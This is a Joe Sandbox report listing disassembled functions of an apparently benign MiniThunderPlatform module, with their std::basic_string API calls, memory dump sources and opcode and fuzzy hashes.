                                                                                                                                                • Part of subcall function 1002B40C: __EH_prolog.LIBCMT ref: 1002B411
                                                                                                                                                • Part of subcall function 1002B40C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1002B427
                                                                                                                                                • Part of subcall function 1002B40C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(000000A1), ref: 1002B445
                                                                                                                                                • Part of subcall function 1002B0FA: __EH_prolog.LIBCMT ref: 1002B0FF
                                                                                                                                                • Part of subcall function 1002B0FA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,100240E7,name), ref: 1002B12C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,?,?,name), ref: 100240F6
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,7C3F18B8,?,name), ref: 10024107
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10024114
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog$??0?$basic_string@CriticalSectionV12@$??1?$basic_string@?assign@?$basic_string@?erase@?$basic_string@EnterLeave
                                                                                                                                              • String ID: name
                                                                                                                                              • API String ID: 1821285802-1579384326
                                                                                                                                              • Opcode ID: f96494a5bae32689231862239f6493cbde9c8c5ee9dd51eb13ebcebb5ec0c6ca
                                                                                                                                              • Instruction ID: 97a4195677eae456c580f8663cc7e3a8ca962814831b1d3c6d986e44943e16ee
                                                                                                                                              • Opcode Fuzzy Hash: f96494a5bae32689231862239f6493cbde9c8c5ee9dd51eb13ebcebb5ec0c6ca
                                                                                                                                              • Instruction Fuzzy Hash: 2F016D31600224EBDB25DFA4DC8DBAD77B1EF58704F408518F416DB291CF35A998CB40
                                                                                                                                              Function 100100F0 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71 ref: 10010151
                                                                                                                                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(?), ref: 10010169
                                                                                                                                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(?), ref: 100101CB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100101E1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10010212
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@?end@?$basic_string@Vconst_iterator@12@$?rend@?$basic_string@D@2@@std@@@2@V?$reverse_iterator@Vconst_iterator@?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 656074548-0
                                                                                                                                              • Opcode ID: 5639019ffcc4e36130cd9dc3d2bff3e9b60db65f26e53f220d62165f038a5c4e
                                                                                                                                              • Instruction ID: cf1d596a02910a438575f39714d247df8715404e76c0658a6d7bd2396e41c723
                                                                                                                                              • Opcode Fuzzy Hash: 5639019ffcc4e36130cd9dc3d2bff3e9b60db65f26e53f220d62165f038a5c4e
                                                                                                                                              • Instruction Fuzzy Hash: D3318075608281AFC714CF24C499A9EBBE1FB9A350F544A0DF8D147292D778E48ACB62
                                                                                                                                              Function 1009C240 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1009C273
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II@Z.MSVCP71 ref: 1009C291
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C2A0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C2D5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C30B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$V01@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 548707936-0
                                                                                                                                              • Opcode ID: dd095616a7be10f5896f88361f07ec8a856e8e6518b237366c9ea49680915787
                                                                                                                                              • Instruction ID: 3380ac30875310ebd9ea7085bbbe6fce60302cb11d937a0e6fb7e1aa8a1a8cc6
                                                                                                                                              • Opcode Fuzzy Hash: dd095616a7be10f5896f88361f07ec8a856e8e6518b237366c9ea49680915787
                                                                                                                                              • Instruction Fuzzy Hash: 48219F765087909FC321CF94C84CB9AFBE4FB9E760F544A4DF4AA83291DB74A448CB12
                                                                                                                                              Function 100013D0 Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@V01@@$??1?$basic_string@?append@?$basic_string@H_prologV12@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3261824692-0
                                                                                                                                              • Opcode ID: ec0a10fb46eaf3227a94bac6ab70af60f0dee3e4849fe5e2af92cb30bb8d2ec0
                                                                                                                                              • Instruction ID: 93708457ce3364426438720ce8ae5f520a679076ce35d34ff1d635e821787368
                                                                                                                                              • Opcode Fuzzy Hash: ec0a10fb46eaf3227a94bac6ab70af60f0dee3e4849fe5e2af92cb30bb8d2ec0
                                                                                                                                              • Instruction Fuzzy Hash: E9F0FF75900129EFCF149FA8C88CAEDBBB5FF1C61AF008189F812A6250CB715648DB94
                                                                                                                                              Function 10001429 Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1000142E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,10277ABC), ref: 10001441
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10001452
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1000145C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000146C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@?append@?$basic_string@H_prologV01@@V12@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2246152937-0
                                                                                                                                              • Opcode ID: 77f7d1e099799458267b1569c5f0a077b767e7d97e441666f2097fdcde38c869
                                                                                                                                              • Instruction ID: 61fc3d0234fa509a7d29d2f566cea25b3bd300205352742d70cd1ddee8761c45
                                                                                                                                              • Opcode Fuzzy Hash: 77f7d1e099799458267b1569c5f0a077b767e7d97e441666f2097fdcde38c869
                                                                                                                                              • Instruction Fuzzy Hash: D0F0FF75900129EFCF149FA8C88CBEDBBB5FF1C61AF008189F816A6250CB715648DB90
                                                                                                                                              Function 10001482 Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@V01@@$??1?$basic_string@H_prologV01@Y?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4086989287-0
                                                                                                                                              • Opcode ID: 669989e8453a815d60e42e330a280267aa171774246bb677b0e3dac4aadf3ad2
                                                                                                                                              • Instruction ID: 628354f3db30c2816ce947433da812e984e4d389e5d6357536f18cebb6d872b2
                                                                                                                                              • Opcode Fuzzy Hash: 669989e8453a815d60e42e330a280267aa171774246bb677b0e3dac4aadf3ad2
                                                                                                                                              • Instruction Fuzzy Hash: B7F01275D00129EFCF14DFA8C88CBEDBBB5FB1C61AF008189F816A6250CB705648DB90
                                                                                                                                              Function 100014DB Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100014E0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,1005BF55), ref: 100014F3
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,1005BF55,?,92492493), ref: 10001504
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,?,?,?,1005BF55,?,92492493), ref: 1000150E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,1005BF55,?,92492493,10245278), ref: 1000151E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@V01@@$??1?$basic_string@H_prologV01@Y?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4086989287-0
                                                                                                                                              • Opcode ID: 96ff9720acb9ef27cb61ae47ac1406b262a8480d0e299d3fd7bab87f8ad52bfd
                                                                                                                                              • Instruction ID: 1a0ecac5412804a9b58f2cb91d2e5ef4de4c80c832e85645f430d3c6943b9129
                                                                                                                                              • Opcode Fuzzy Hash: 96ff9720acb9ef27cb61ae47ac1406b262a8480d0e299d3fd7bab87f8ad52bfd
                                                                                                                                              • Instruction Fuzzy Hash: A4F01775D00129EFCF14DFA8C84CBEDBBB5FB1C619F008189F816A6250CB705644DB90
                                                                                                                                              Function 10001534 Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001539
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1000154C
                                                                                                                                              • ?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1000155D
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001567
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 10001577
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??0?$basic_string@_V01@@$??1?$basic_string@_?append@?$basic_string@_H_prologV12@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2583362943-0
                                                                                                                                              • Opcode ID: 8f59378f24c59a3d1730b2e10ab512f85a855f19ecbe122f571346eb8e73020f
                                                                                                                                              • Instruction ID: a4abf127c3a6097a3bcd637e965759495039974d84d57af22f5d25f4052434e3
                                                                                                                                              • Opcode Fuzzy Hash: 8f59378f24c59a3d1730b2e10ab512f85a855f19ecbe122f571346eb8e73020f
                                                                                                                                              • Instruction Fuzzy Hash: 0CF0177590012AEFCF14DFA8C84D7EDBBB4FB1C615F008149E816A2251CB745648CBA0
                                                                                                                                              Function 10001075 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1000107A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001090
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000109D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100010AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100010B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1526739352-0
                                                                                                                                              • Opcode ID: 27ae8f861a2d6f0784d7def67a891ac4cbd6a64366ffa47ff8682db076154127
                                                                                                                                              • Instruction ID: e81a82610130bd97dde222f01576707286f18ec18f1bfe2055d7363ac9ad83c0
                                                                                                                                              • Opcode Fuzzy Hash: 27ae8f861a2d6f0784d7def67a891ac4cbd6a64366ffa47ff8682db076154127
                                                                                                                                              • Instruction Fuzzy Hash: 1DF05870800665EFD724CBA4CA4D79DBBB0FB28715F0042CDE49793692DBB06A48CB10
                                                                                                                                              Function 10001197 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1000119C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100011AB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100011B8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100011C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100011D2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 40241651-0
                                                                                                                                              • Opcode ID: ddb4add9e56fd4b2343ffbbe73e3a50fb5d7ba457c25312ca9d41adca80d7053
                                                                                                                                              • Instruction ID: 6570485a09fea2c99c3ef3aed8de5a85abecc1f9c3104c70fa3ddf0ef5ed81be
                                                                                                                                              • Opcode Fuzzy Hash: ddb4add9e56fd4b2343ffbbe73e3a50fb5d7ba457c25312ca9d41adca80d7053
                                                                                                                                              • Instruction Fuzzy Hash: 09F05831810664DFC725CF94C44C7ADBBB0FB28A05F00418DF44393A50CBB06A48CB91
                                                                                                                                              Function 10089031 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089075
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008909D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100890ED
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089115
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089165
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008918D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100891DD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089205
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
